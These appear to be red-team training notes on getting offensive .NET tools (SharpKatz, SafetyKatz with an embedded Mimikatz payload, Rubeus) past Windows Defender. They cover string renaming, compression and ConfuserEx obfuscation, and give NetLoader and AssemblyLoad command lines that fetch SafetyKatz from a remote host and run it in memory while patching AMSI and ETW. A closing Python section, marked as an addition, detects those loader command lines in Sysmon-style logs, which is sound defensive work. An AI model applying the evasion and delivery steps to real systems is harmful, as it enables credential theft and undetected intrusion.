Currently, .NET lacks some of the security features implemented in System.Management.Automation.dll (the PowerShell engine). Because of this, many Red teams have included .NET in their tradecraft.
There are many open source offensive .NET tools, and we will use the ones that fit our attack methodology.
When using .NET (or any other compiled language), there are some challenges:
- Detection by countermeasures like AV, EDR, etc.
- Delivery of the payload (recall PS sweet download-execute cradles!)
- Detection by logging like Process Creation, Command-line logging, etc.
We will try to address AV detection and delivery of the payload.
We will focus on bypassing signature-based detection by Windows Defender. For that, we use techniques like:
- Obfuscation
- String Manipulation
- ...
We can use DefenderCheck to identify code and strings in a binary that Windows Defender may flag. This helps us decide which parts of the source code to modify, keeping obfuscation minimal.
Defender Check
To check SharpKatz.exe for signatures using DefenderCheck:
DefenderCheck.exe <SharpKatz.exe_path>
- As shown, it will be detected by Windows Defender
- Open the .NET project in Visual Studio
- Press CTRL + H
- Find and replace the string Credentials with Credents (you can use any other string as a replacement, but make sure that string is not already present in the code)
- Select the scope as Entire Solution
- Press the Replace All button
- Build and recheck the binary with DefenderCheck
- Repeat the above steps if there is still a detection
For SafetyKatz.exe, do the following steps:
- Download the latest version of Mimikatz (https://github.com/gentilkiwi/mimikatz) and Out-CompressedDll.ps1 (https://github.com/PowerShellMafia/PowerSploit/blob/master/ScriptModification/Out-CompressedDll.ps1)
- Run Out-CompressedDll.ps1 on the Mimikatz binary and save the output to a file:
Out-CompressedDll <path_Mimikatz.exe> > <outfile>.txt
- Copy the value of the variable $EncodedCompressedFile from the output file above and replace the value of the compressedMimikatzString variable in the Constants.cs file of SafetyKatz.
- Copy the byte size from the output file and replace it in the Program.cs file on lines 111 and 116.
- Finally, build and recheck the binary with DefenderCheck.
For BetterSafetyKatz, we used the following steps:
- Download the latest release of the mimikatz_trunk.zip file. Then convert the file to base64.
- Modify Program.cs:
  - Add a new variable that contains the base64 value of the mimikatz_trunk.zip file
  - Comment out the code that downloads the Mimikatz file or accepts it as an argument
  - Convert the base64 string to bytes and pass it to the zipStream variable
For Rubeus.exe, we used ConfuserEx to obfuscate.
- Launch ConfuserEx
- In the Project tab, select the Base Directory where the binary file is located
- In the Project tab, select the binary file that we want to obfuscate
- In the Settings tab, add the rules
- In the Settings tab, edit the rule and select the preset as Normal
- In the Protect tab, click on the Protect button
- We will find the new obfuscated binary in the Confused folder under the Base Directory.
We can use NetLoader to deliver our binary payloads. It can load a binary from a file path or URL and patches AMSI and ETW while executing:
C:\Users\Public\Loader.exe -Path http://192.168.100.64/SafetyKatz.exe
We also have AssemblyLoad.exe, which can be used to load NetLoader in memory from a URL, which then loads a binary from a file path or URL:
C:\Users\Public\AssemblyLoad.exe http://192.168.100.64/Loader.exe -Path http://192.168.100.64/SafetyKatz.exe
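The third challenge listed at the top, process-creation and command-line logging, is not addressed by the loaders above: both invocations land verbatim in Sysmon Event ID 1 or Windows 4688 records. As an added example that is not part of the original notes, this Python script runs a simple detection over constructed Sysmon-style records that mirror those two command lines; the field names, the user-writable directory list and the scoring rules are assumptions.

```python
import re

# Constructed Sysmon Event ID 1 style records (field names assumed); the first
# two command lines mirror the NetLoader and AssemblyLoad invocations above,
# the other two are benign controls.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\Public\Loader.exe",
     "CommandLine": r"C:\Users\Public\Loader.exe -Path http://192.168.100.64/SafetyKatz.exe"},
    {"Image": r"C:\Users\Public\AssemblyLoad.exe",
     "CommandLine": r"C:\Users\Public\AssemblyLoad.exe http://192.168.100.64/Loader.exe "
                    r"-Path http://192.168.100.64/SafetyKatz.exe"},
    {"Image": r"C:\Program Files\Git\bin\git.exe",
     "CommandLine": "git clone https://github.com/gentilkiwi/mimikatz"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\alice\notes.txt"},
]

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# Directories any local user can write to (assumed list): a binary launched
# from one of these that takes a URL argument deserves a closer look.
USER_WRITABLE = ("c:\\users\\public\\", "c:\\windows\\temp\\", "c:\\programdata\\")
EXEC_EXT = (".exe", ".dll")

def score_event(event):
    """Return the reasons this process-creation event looks like a remote-payload
    loader; an empty list means nothing suspicious was found."""
    urls = URL_RE.findall(event["CommandLine"])
    if not urls:
        return []
    reasons = []
    if any(u.lower().endswith(EXEC_EXT) for u in urls):
        reasons.append("command line references a remote executable (.exe/.dll)")
    if event["Image"].lower().startswith(USER_WRITABLE):
        reasons.append("binary in a user-writable directory given a URL argument")
    if len(urls) > 1:
        reasons.append("multiple URLs: possible chained loader (loader fetching a loader)")
    return reasons

def detect(events):
    """Return [(command_line, reasons)] for every event with at least one reason."""
    return [(e["CommandLine"], r) for e in events if (r := score_event(e))]

if __name__ == "__main__":
    for cmd, why in detect(SAMPLE_EVENTS):
        print(cmd)
        for reason in why:
            print("   -", reason)
```

Both loader command lines are flagged while the git clone (a URL, but a signed tool outside a user-writable path and no executable target) and notepad are not.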